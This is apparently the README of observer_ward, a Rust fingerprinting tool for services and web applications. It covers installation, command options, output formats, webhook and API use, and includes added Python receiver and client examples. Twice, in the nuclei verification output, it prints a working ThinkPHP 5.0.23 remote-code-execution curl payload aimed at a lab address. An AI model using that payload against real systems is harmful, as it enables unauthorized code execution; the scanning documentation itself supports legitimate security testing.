observer_ward


observer_ward(侦查守卫)

Service and web application fingerprinting tool

About this project

Category      Description
Author        三米前有蕉皮
Team          0x727, which will open-source more tools over the coming period
Positioning   Community-driven fingerprint library and identification tool
Language      Rust
Function      Service and web application fingerprinting tool


Installation

Build from source

cargo build --release --manifest-path=observer_ward/Cargo.toml

Binary install

Install with brew on macOS

brew install observer_ward

Docker image

➜ docker run --rm -it kaliteam/observer_ward -t http://172.17.0.2
[INFO ] probes loaded: 2223
[INFO ] optimized probes: 7
[INFO ] target loaded: 1
|_uri:[ http://172.17.0.2/ [apache-http]  <> (200 OK) ]
|_uri:[ http://172.17.0.2/ [thinkphp]  <> (200 OK) ]
➜  docker run --rm -it kaliteam/observer_ward:nuclei -t http://172.17.0.2 --plugin default
[INFO ] probes loaded: 2223
[INFO ] optimized probes: 7
[INFO ] target loaded: 1
|_uri:[ http://172.17.0.2/ [apache-http]  <> (200 OK) ]
|_uri:[ http://172.17.0.2/ [thinkphp]  <> (200 OK) ]
 |_exploitable: [Critical] thinkphp-5023-rce: ThinkPHP 5.0.23 - Remote Code Execution
  |_matched_at: http://172.17.0.2/index.php?s=captcha
  |_shell: curl -X 'POST' -d '_method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=1' -H 'Accept: */*' -H 'Accept-Language: en' -H 'Content-Type: application/x-www-form-urlencoded' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.3.23' 'http://172.17.0.2/index.php?s=captcha'

Getting started

➜  ~ ./observer_ward -u
➜  ~ ./observer_ward -t http://httpbin.org/
[INFO ] 📇probes loaded: 6183
[INFO ] 🎯target loaded: 1
[INFO ] 🚀optimized probes: 8
🎯:[ http://httpbin.org/ [0example,swagger]  <httpbin.org> (200 OK) ]
➜ ./observer_ward --help                                                                      
Usage: observer_ward [-l <list>] [-t <target...>] [-p <probe-path>] [--probe-dir <probe-dir...>] [--ua <ua>] [--mode <mode>] [--timeout <timeout>] [--thread <thread>] [--proxy <proxy>] [--ir] [--ic] [--plugin <plugin>] [-o <output>] [--format <format>] [--no-color] [--nuclei-args <nuclei-args...>] [--silent] [--debug] [--config-dir <config-dir>] [--update-self] [-u] [--update-plugin] [--daemon] [--token <token>] [--webhook <webhook>] [--webhook-auth <webhook-auth>] [--api-server <api-server>]

observer_ward

Options:
  -l, --list        multiple targets from file path
  -t, --target      the target (required)
  -p, --probe-path  customized fingerprint json file path
  --probe-dir       customized fingerprint yaml file dir
  --ua              customized ua
  --mode            mode probes option[tcp,http,all] default: all
  --timeout         set request timeout.
  --thread          number of concurrent threads.
  --proxy           proxy to use for requests
                    (ex:[http(s)|socks5(h)]://host:port)
  --ir              include request/response pairs in output
  --ic              include certificate pairs in output
  --plugin          customized template dir
  -o, --output      export to the file
  --format          output format option[json,csv,txt] default: txt
  --no-color        disable output content coloring
  --nuclei-args     poc nuclei engine additional args
  --silent          silent mode
  --debug           debug mode
  --config-dir      customized template dir
  --update-self     update self
  -u, --update-fingerprint
                    update fingerprint
  --update-plugin   update plugin
  --daemon          api background service
  --token           api Bearer authentication
  --webhook         send results to webhook server
                    (ex:https://host:port/webhook)
  --webhook-auth    the auth will be set to the webhook request header
                    AUTHORIZATION
  --api-server      start a web API service (ex:127.0.0.1:8080)
  --help            display usage information
Parameter                 Purpose and description
-l, --list                Read the target list from a file, one target per line
-t, --target              One or more targets
-p, --probe-path          Path to the JSON probe file (when used together with --probe-dir, this is the output path of the converted JSON file)
--probe-dir               YAML probe directory (when used together with -p, every YAML file under the directory is read and converted into a single JSON file)
--ua                      Set the User-Agent request header
--mode                    Probe mode. --help lists tcp, http and all (default all). The older description of a safe mode (requests only the home page) and a danger mode (also requests special paths, easily blocked by a WAF) does not match that help text; trust --help for the binary you run
--timeout                 Request and connection timeout, in seconds
--thread                  Number of targets identified concurrently; defaults to the number of CPU cores
--proxy                   Proxy server; http and socks5 are supported, e.g. https://username:password@your-proxy.com:port
--ir                      Keep the request and response in the JSON result; this can consume a lot of memory
--ic                      Keep certificate data in the JSON result
--plugin                  Path to the nuclei templates; enables vulnerability verification with nuclei. The value default uses the plugins directory under the config folder
-o, --output              Save the result to a file; --format can be omitted when the file extension is one of the formats below
--format                  Output format: json, csv or txt; when saving to a file it is inferred from the file extension
--no-color                Disable colored output
--nuclei-args             Extra arguments for nuclei, split on spaces and appended to the nuclei command line, e.g. -es info to exclude info-severity templates
--silent                  Silent mode: print no informational messages; commonly used when the tool's output feeds a command-line pipeline
--debug                   Debug mode: print more information, including requests and responses, the extracted favicon hash and the nuclei command line
--config-dir              Config folder; defaults to the observer_ward directory under the user's config folder
--update-self             Update the program itself from the project's defaultv4 release tag
-u, --update-fingerprint  Download the fingerprint library into the config folder, overwriting web_fingerprint_v4.json
--update-plugin           Download the community nuclei templates into the config folder; the zip is unpacked automatically and overwrites the plugins directory
--daemon                  Run the API service in the background (not supported on Windows)
--token                   Bearer token for the API service
--webhook                 Send identification results to the given webhook URL
--webhook-auth            Value sent in the AUTHORIZATION header of webhook requests
--api-server              Listen address and port of the API service
--help                    Print help information

Updating the fingerprint library

➜ ./observer_ward -u
OS        Save path
Windows   C:\Users\Alice\AppData\Roaming\observer_ward\web_fingerprint_v4.json
Linux     /home/alice/.config/observer_ward/web_fingerprint_v4.json
macOS     /Users/Alice/Library/Application Support/observer_ward/web_fingerprint_v4.json

To build one JSON probe file from YAML fingerprint directories, pass the directories with --probe-dir (repeatable) and the output path with -p:
➜ ./observer_ward --probe-dir web_fingerprint --probe-dir service_fingerprint/null -p fingerprint_v4.json
[INFO ] ℹ️ convert the 6183 yaml file of the probe directory to a json file fingerprint_v4.json
➜ ~ ./observer_ward --probe-dir FingerprintHub/service-fingerprint/null -p .config/observer_ward/service_fingerprint_v4.json
[INFO ] ℹ️ convert the 3960 yaml file of the probe directory to a json file .config/observer_ward/service_fingerprint_v4.json

Debug mode

➜ ./observer_ward -t http://httpbin.org -p observer_ward/examples/json.yaml --debug
[INFO ] 📇probes loaded: 1
[INFO ] 🎯target loaded: 1
[INFO ] 🚀optimized probes: 1
[DEBUG] start: http://httpbin.org/
[DEBUG] Request {
    uri: http://httpbin.org/ip,
    version: HTTP/1.1,
    method: GET,
    headers: {
        "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
        "content-type": "application/json",
    },
    body: None,
    raw_request: None,
}
[DEBUG] Response {
    version: HTTP/1.1,
    uri: http://httpbin.org/ip,
    status_code: 200,
    headers: {
        "date": "Mon, 08 Jul 2024 13:19:59 GMT",
        "content-type": "application/json",
        "content-length": "32",
        "connection": "keep-alive",
        "server": "gunicorn/19.9.0",
        "access-control-allow-origin": "*",
        "access-control-allow-credentials": "true",
    },
    extensions: Extensions,
    body: Some(
        {
          "origin": "1.1.1.1"
        }
        ,
    ),
}
[DEBUG] end: http://httpbin.org/
🎯:[ http://httpbin.org/]
🎯:[ http://httpbin.org/ip [httpbin-ip] <>]
 |_📰: ip:["1.1.1.1"]


Target input

Targets come from repeated -t options, from a file with -l (one per line), or from standard input when piped in; a tcp://host:port entry is probed as a plain service, as the SSH banner below shows.

➜  ~ ./observer_ward -t https://www.example.com/ -t http://httpbin.org                                            
[INFO ] 📇probes loaded: 6183
[INFO ] 🎯target loaded: 2
[INFO ] 🚀optimized probes: 8
🎯:[ https://www.example.com/ <Example Domain>  (200 OK) ]
🎯:[ http://httpbin.org/ [0example,swagger]  <httpbin.org> (200 OK) ]
➜  ~ ./observer_ward -l target.txt                                            
[INFO ] 📇probes loaded: 6183
[INFO ] 🎯target loaded: 3
[INFO ] 🚀optimized probes: 8
🎯:[ tcp://127.0.0.1:22/ [ssh]  <SSH-2.0-OpenSSH_9.7>]
 |_📰: version:[9.7] info:[protocol 2.0] 
🎯:[ http://172.17.0.2/ [apache-http]  <>]
🎯:[ http://172.17.0.2/ [thinkphp]  <>]
🎯:[ http://httpbin.org/ [swagger,0example]  <httpbin.org> (200 OK) ]
➜  ~ echo http://172.17.0.2 | ./observer_ward        
[INFO ] 📇probes loaded: 6183
[INFO ] 🚀optimized probes: 8
[INFO ] 🎯target loaded: 1
🎯:[ http://172.17.0.2/ [apache-http]  <>]
🎯:[ http://172.17.0.2/ [thinkphp]  <>]


Result output

➜  ~ ./observer_ward -t https://www.example.com/ -o output.txt
[INFO ] 📇probes loaded: 6183
[INFO ] 🚀optimized probes: 8
[INFO ] 🎯target loaded: 1
➜  ~ cat output.txt 
🎯:[ https://www.example.com/ <Example Domain>  (200 OK) ]
➜  ~ ./observer_ward -t https://httpbin.org/  -o output.json
[INFO ] 📇probes loaded: 6183
[INFO ] 🚀optimized probes: 8
[INFO ] 🎯target loaded: 1
➜  ~ cat output.json 
{"https://httpbin.org/":{"title":["httpbin.org"],"status":200,"favicon":{"https://httpbin.org/static/favicon.ico":{"md5":"3aa2067193b2ed83f24c30bd238a717c","mmh3":"-1296740046"}},"name":["swagger"],"fingerprints":[{"matcher-results":[{"template":"swagger","info":{"name":"swagger","author":"cn-kali-team","tags":"detect,tech,swagger","severity":"info","metadata":{"product":"swagger","vendor":"00_unknown","verified":true}},"matcher-name":["swagger-ui.css"],"extractor":{}}],"matched-at":"https://httpbin.org/"}],"nuclei":{}}}
➜  ~ ./observer_ward_amd64 -t http://172.17.0.2 --format json --ir --ic --silent |jq

Results can also be pushed to a webhook. The receiver below (observer_ward/examples/webhook.py) accepts them; the value given to --webhook-auth arrives verbatim in the Authorization header.

from flask import Flask, request

app = Flask(__name__)


@app.route("/webhook", methods=['POST'])
def observer_ward_webhook():
    # --webhook-auth is delivered as-is in the Authorization header. This demo
    # only prints it and never verifies it, so keep the receiver on localhost.
    print("Authorization: ", request.headers.get("Authorization"))
    # The result document sent by observer_ward, one entry per target.
    print(request.json)
    return 'ok'


if __name__ == '__main__':
    app.run()
➜  observer_ward git:(main) ✗ python observer_ward/examples/webhook.py
 * Serving Flask app 'webhook'
 * Debug mode: off
WARNING: This is a development server. Do not use it in a production deployment. Use a production WSGI server instead.
 * Running on http://127.0.0.1:5000
Press CTRL+C to quit
➜  ~ ./observer_ward -t http://httpbin.org --webhook http://127.0.0.1:5000/webhook --webhook-auth 22e038328151a7a06fd4ebfa63a10228
[INFO ] 📇probes loaded: 6183
[INFO ] 🚀optimized probes: 8
[INFO ] 🎯target loaded: 1
🎯:[ http://httpbin.org/ [swagger,0example]  <httpbin.org> (200 OK) ]
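The Flask receiver prints the Authorization header but never checks it, and the JSON it receives is the same per-target document that -o output.json writes (shown in the result output section above). The receiver below is an added example written for this page, not the project's webhook.py: it compares the AUTHORIZATION header with the --webhook-auth secret in constant time before reading the body, then flattens each target into one row per fingerprint match so the rows can be loaded into a spreadsheet or SIEM. It uses only the standard library so it runs without Flask. The environment variable OBSERVER_WARD_WEBHOOK_AUTH, the listen address and the assumption that the webhook body has the same shape as -o output.json are mine, not the project's; the nuclei field is left opaque because the page does not show its inner format.

```python
"""Hardened receiver for observer_ward --webhook results (added example, not project code).

Assumptions: the secret passed to --webhook-auth is supplied here via the
OBSERVER_WARD_WEBHOOK_AUTH environment variable, the receiver listens on
127.0.0.1:5000, and the webhook body is the same JSON document that
`observer_ward -o output.json` writes (target -> title/status/favicon/name/fingerprints/nuclei).
"""
import hmac
import json
import os
from http.server import BaseHTTPRequestHandler, HTTPServer

# Result document for https://httpbin.org/ copied from the README's -o output.json example.
SAMPLE_RESULT = json.loads('''{"https://httpbin.org/":{"title":["httpbin.org"],"status":200,"favicon":{"https://httpbin.org/static/favicon.ico":{"md5":"3aa2067193b2ed83f24c30bd238a717c","mmh3":"-1296740046"}},"name":["swagger"],"fingerprints":[{"matcher-results":[{"template":"swagger","info":{"name":"swagger","author":"cn-kali-team","tags":"detect,tech,swagger","severity":"info","metadata":{"product":"swagger","vendor":"00_unknown","verified":true}},"matcher-name":["swagger-ui.css"],"extractor":{}}],"matched-at":"https://httpbin.org/"}],"nuclei":{}}}''')


def check_webhook_auth(header_value, expected):
    """Constant-time comparison of the AUTHORIZATION header with the --webhook-auth value."""
    if header_value is None or not expected:
        return False
    return hmac.compare_digest(header_value.encode(), expected.encode())


def flatten_results(payload):
    """Turn one observer_ward result document into flat rows, one per fingerprint match."""
    rows = []
    for target, info in payload.items():
        favicon_hashes = [v.get("mmh3") for v in info.get("favicon", {}).values()]
        for fp in info.get("fingerprints", []):
            for m in fp.get("matcher-results", []):
                meta = m.get("info", {})
                rows.append({
                    "target": target,
                    "matched_at": fp.get("matched-at"),
                    "status": info.get("status"),
                    "title": (info.get("title") or [None])[0],
                    "template": m.get("template"),
                    "product": meta.get("metadata", {}).get("product"),
                    "severity": meta.get("severity"),
                    "matchers": ",".join(m.get("matcher-name", [])),
                    "favicon_mmh3": ",".join(h for h in favicon_hashes if h),
                    # nuclei inner format is not shown on the page; only count entries
                    "nuclei_findings": len(info.get("nuclei") or {}),
                })
    return rows


class WebhookHandler(BaseHTTPRequestHandler):
    secret = os.environ.get("OBSERVER_WARD_WEBHOOK_AUTH", "")  # assumption: secret from env

    def do_POST(self):
        if self.path != "/webhook":
            self.send_error(404)
            return
        # Reject before touching the body: an unauthenticated caller gets no parsing at all.
        if not check_webhook_auth(self.headers.get("Authorization"), self.secret):
            self.send_error(401)
            return
        length = int(self.headers.get("Content-Length", "0"))
        try:
            payload = json.loads(self.rfile.read(length))
        except ValueError:
            self.send_error(400)
            return
        for row in flatten_results(payload):
            print(row)
        self.send_response(200)
        self.end_headers()
        self.wfile.write(b"ok")

    def log_message(self, fmt, *args):  # keep stdout for result rows only
        pass


if __name__ == "__main__":
    if not WebhookHandler.secret:
        raise SystemExit("set OBSERVER_WARD_WEBHOOK_AUTH to the value passed to --webhook-auth")
    HTTPServer(("127.0.0.1", 5000), WebhookHandler).serve_forever()
```

Run it with OBSERVER_WARD_WEBHOOK_AUTH set to the same string you pass to --webhook-auth, then point observer_ward at http://127.0.0.1:5000/webhook as in the command above. flatten_results works unchanged on a file written with -o output.json or on the body returned by the API service, since all three carry the same document.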


Updating nuclei plugins

./observer_ward --update-plugin downloads the community nuclei templates into the plugins directory of the config folder; --plugin default then uses that directory.

Verifying vulnerabilities with the integrated nuclei

➜  ~ ./observer_ward -t http://172.17.0.2/ --plugin default
[INFO ] 📇probes loaded: 6183
[INFO ] 🚀optimized probes: 8
[INFO ] 🎯target loaded: 1
🎯:[ http://172.17.0.2/ [apache-http]  <>]
🎯:[ http://172.17.0.2/ [thinkphp]  <>]
 |_🐞: [Critical] thinkphp-5023-rce: ThinkPHP 5.0.23 - Remote Code Execution
  |_🔥: http://172.17.0.2/index.php?s=captcha
  |_🐚: curl -X 'POST' -d '_method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=1' -H 'Accept: */*' -H 'Accept-Language: en' -H 'Content-Type: application/x-www-form-urlencoded' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5 Safari/605.1.15 Ddg/17.4' 'http://172.17.0.2/index.php?s=captcha'

Starting the web API service

➜  ~ ./observer_ward --api-server 127.0.0.1:8000 --token 22e038328151a7a06fd4ebfa63a10228
[INFO ] 📇probes loaded: 6183
[INFO ] 🚀optimized probes: 8
[INFO ] 🌐API service has been started: http://127.0.0.1:8000/v1/observer_ward
[INFO ] 📔:curl --request POST \
      --url http://127.0.0.1:8000/v1/observer_ward \
      --header 'Authorization: Bearer 22e038328151a7a06fd4ebfa63a10228' \
      --json '{"target":["https://httpbin.org/"]}'
[INFO ] 🗳:[result...]
➜  ~ curl --request POST \                                                                                                     
  --url http://127.0.0.1:8000/v1/observer_ward \
  --header 'Authorization: Bearer 22e038328151a7a06fd4ebfa63a10228' \
  --json '{"target":["https://httpbin.org/"]}'
{"https://httpbin.org/":{"title":["httpbin.org"],"status":200,"favicon":{"https://httpbin.org/static/favicon.ico":{"md5":"3aa2067193b2ed83f24c30bd238a717c","mmh3":"-1296740046"}},"name":["swagger"],"fingerprints":[{"matcher-results":[{"template":"swagger","info":{"name":"swagger","author":"cn-kali-team","tags":"detect,tech,swagger","severity":"info","metadata":{"product":"swagger","vendor":"00_unknown","verified":true}},"matcher-name":["swagger-ui.css"],"extractor":{}}],"matched-at":"https://httpbin.org/"}],"nuclei":{}}}
➜  ~ curl --request GET \
  --url http://127.0.0.1:8000/v1/config \
  --header 'Authorization: Bearer 22e038328151a7a06fd4ebfa63a10228' \
  --header 'Content-Type: application/json'
{"target":[],"ua":"Mozilla/5.0 (X11; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/94.0","timeout":10,"thread":4,"ir":false,"ic":false,"update-fingerprint":false,"update-plugin":false,"webhook":null,"webhook-auth":null}
➜  ~ curl --request POST \
  --url http://127.0.0.1:8000/v1/config \
  --header 'Authorization: Bearer 22e038328151a7a06fd4ebfa63a10228' \
  --json '{"target":[],"update-plugin":true,"update-fingerprint":true}'
{"target":[],"ua":"Mozilla/5.0 (X11; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/94.0","timeout":10,"thread":4,"ir":false,"ic":false,"update-fingerprint":true,"update-plugin":true,"webhook":null,"webhook-auth":null}
➜  ~ ./observer_ward --api-server /tmp/observer_ward.socket
[INFO ] 📇probes loaded: 6183
[INFO ] 🚀optimized probes: 8
[INFO ] 🌐API service has been started: /tmp/observer_ward.socket
[INFO ] 📔:curl --request POST \
      --unix-socket /tmp/observer_ward.socket \
      --url http://localhost/v1/observer_ward \
      --header 'Authorization: Bearer 22e038328151a7a06fd4ebfa63a10228' \
      --json '{"target":["https://httpbin.org/"]}'
[INFO ] 🗳:[result...]
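The same exchange driven from Python instead of curl, as an added example that is not part of the project: a small client that sends the Bearer token to /v1/observer_ward and /v1/config over either host:port or the Unix socket path that --api-server accepts. StubApi is an assumption of mine, a stand-in for a running observer_ward that only checks the token and returns a canned result, so the request/response round trip can be run offline; replace the listen value with the real service's address to use it for real. The token string is the one shown on the page.

```python
"""Client for the observer_ward API service over TCP or a Unix socket.

Added example, not observer_ward's own code. StubApi (below) is an assumption:
it stands in for `observer_ward --api-server ... --token ...`, checks the Bearer
token and answers with a canned result so the example runs without the binary.
"""
import http.client
import json
import os
import socket
import tempfile
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

TOKEN = "22e038328151a7a06fd4ebfa63a10228"  # the value given to --token on the page


class UnixHTTPConnection(http.client.HTTPConnection):
    """HTTP over AF_UNIX, for --api-server /tmp/observer_ward.socket."""

    def __init__(self, path, timeout=30):
        super().__init__("localhost", timeout=timeout)
        self.unix_path = path

    def connect(self):
        self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        self.sock.settimeout(self.timeout)
        self.sock.connect(self.unix_path)


def open_connection(listen):
    """host:port selects TCP; a value containing a slash is taken as a socket path."""
    if "/" in listen:
        return UnixHTTPConnection(listen)
    host, port = listen.rsplit(":", 1)
    return http.client.HTTPConnection(host, int(port), timeout=30)


def api_call(listen, token, method, path, body=None):
    """One authenticated request; returns (status, parsed JSON on 200, else None)."""
    conn = open_connection(listen)
    headers = {"Authorization": f"Bearer {token}", "Content-Type": "application/json"}
    data = None if body is None else json.dumps(body).encode()
    try:
        conn.request(method, path, body=data, headers=headers)
        resp = conn.getresponse()
        raw = resp.read()
    finally:
        conn.close()
    return resp.status, (json.loads(raw) if resp.status == 200 and raw else None)


def scan(listen, token, targets):
    return api_call(listen, token, "POST", "/v1/observer_ward", {"target": targets})


def get_config(listen, token):
    return api_call(listen, token, "GET", "/v1/config")


# --- stub standing in for the real service (assumption, not observer_ward) ---
CANNED = {"https://httpbin.org/": {"title": ["httpbin.org"], "status": 200, "name": ["swagger"], "nuclei": {}}}
CONFIG = {"target": [], "timeout": 10, "thread": 4, "ir": False, "ic": False}


class StubApi(BaseHTTPRequestHandler):
    def _reply(self, code, obj):
        body = json.dumps(obj).encode()
        self.send_response(code)
        self.send_header("Content-Type", "application/json")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def _authorized(self):
        return self.headers.get("Authorization") == f"Bearer {TOKEN}"

    def do_GET(self):
        if not self._authorized():
            return self._reply(401, {"error": "unauthorized"})
        self._reply(200, CONFIG) if self.path == "/v1/config" else self._reply(404, {})

    def do_POST(self):
        if not self._authorized():
            return self._reply(401, {"error": "unauthorized"})
        req = json.loads(self.rfile.read(int(self.headers.get("Content-Length", "0"))))
        if self.path != "/v1/observer_ward":
            return self._reply(404, {})
        self._reply(200, {t: CANNED.get(t, {}) for t in req.get("target", [])})

    def log_message(self, *args):
        pass


class UnixHTTPServer(HTTPServer):
    address_family = getattr(socket, "AF_UNIX", socket.AF_INET)

    def server_bind(self):  # HTTPServer.server_bind expects (host, port); a path has neither
        self.socket.bind(self.server_address)


def run_demo():
    """Serve the stub on TCP and on a Unix socket, query both, return the replies."""
    tcp = HTTPServer(("127.0.0.1", 0), StubApi)
    threading.Thread(target=tcp.serve_forever, daemon=True).start()
    listen = f"127.0.0.1:{tcp.server_port}"
    out = {"tcp": scan(listen, TOKEN, ["https://httpbin.org/"]),
           "bad_token": scan(listen, "not-the-token", ["https://httpbin.org/"]),
           "config": get_config(listen, TOKEN)}
    tcp.shutdown(); tcp.server_close()
    if hasattr(socket, "AF_UNIX"):
        path = os.path.join(tempfile.mkdtemp(), "observer_ward.socket")
        ux = UnixHTTPServer(path, StubApi)
        threading.Thread(target=ux.serve_forever, daemon=True).start()
        out["unix"] = scan(path, TOKEN, ["https://httpbin.org/"])
        ux.shutdown(); ux.server_close()
    return out


if __name__ == "__main__":
    print(json.dumps(run_demo(), indent=2))
```

Prefer the Unix-socket form when the client runs on the same host: the socket's file permissions limit who can reach the service at all, whereas a TCP listener relies on the Bearer token alone, which travels in clear text over plain HTTP.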

Submitting fingerprints

Fingerprints are kept as YAML files; the --probe-dir example above converts the FingerprintHub directories into the JSON probe file the scanner loads.

Contributing to observer_ward

Submitting code

git clone git@github.com:YOUR_GITHUB_USERNAME/observer_ward.git
cd observer_ward
git remote add upstream git@github.com:emo-crab/observer_ward.git
git fetch upstream
git config --global user.name "$GITHUB_USERNAME"
git config --global user.email "$GITHUB_EMAIL"
git config --global github.user "$GITHUB_USERNAME"
git fetch --all
git fetch upstream
git checkout -b dev
git add <files you added or modified>
git commit -m "<describe your change>"
git push origin dev


License

Distributed under the GPL-3.0-only License. See LICENSE for more information.


Contact

Your Name - @Kali_Team - root@kali-team.cn

Project Link: https://github.com/emo-crab/observer_ward


Acknowledgments


Stargazers over time
